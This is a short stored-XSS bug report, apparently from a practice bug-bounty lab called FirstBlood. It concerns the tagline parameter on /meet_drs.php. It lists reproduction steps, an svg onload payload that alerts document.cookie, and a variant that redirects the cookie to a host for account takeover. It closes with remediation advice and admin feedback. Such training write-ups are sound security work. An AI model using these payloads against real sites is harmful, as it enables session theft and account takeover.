FirstBlood-#1544 — [Collab] Tagline XSS on /meet drs.php
This issue was discovered on FirstBlood v3
On 2022-12-11, mr_xhunt 
Level 8
reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
COLLAB: ar6aaz
Summary:
Found Tagline Removed when I edited the doctor with id=4 on the /meet_drs.php and then tried adding tagline payload but at first it didn't worked but when we add photoUrl parameter then the parameter is accepted and then entered the xss payload and executed XSS successfully.
Steps to Reproduce:
- Login as admin and Then Intercept the modifying request of doctors
- Now add
photoUrl and tagline parameter as well (note the photoUrl value must be relative Url)
- Add the payload in the
tagline parameter: xx"><svg onload=alert(document.cookie)//
- Visit the following endpoint:
/meet_drs.php, the XSS will execute
- The payload in the Source looks like this:
- The payload can be changed to successfully leak the cookie for ATO:
"><svg onload=alert(document.location=https://localhost/?${document.cookie})//
Underlying_Issue: The Tagline value is not Sanitized before inserting it into the Source
Remediation: Either the Tagline parameter should not be available like this or Sanitization must be done.
P2 High
Endpoint: /meet_drs.php
Parameter: tagline
Payload: xx"><svg onload=alert(document.cookie)//
FirstBlood ID: 70
Vulnerability Type: Stored XSS
Doctors can have taglines set however the tagline is vulnerable to stored XSS on meet_drs.php
Report Feedback
Creator & Administrator
Congratulations you were third to discover this and your bounty has been split evenly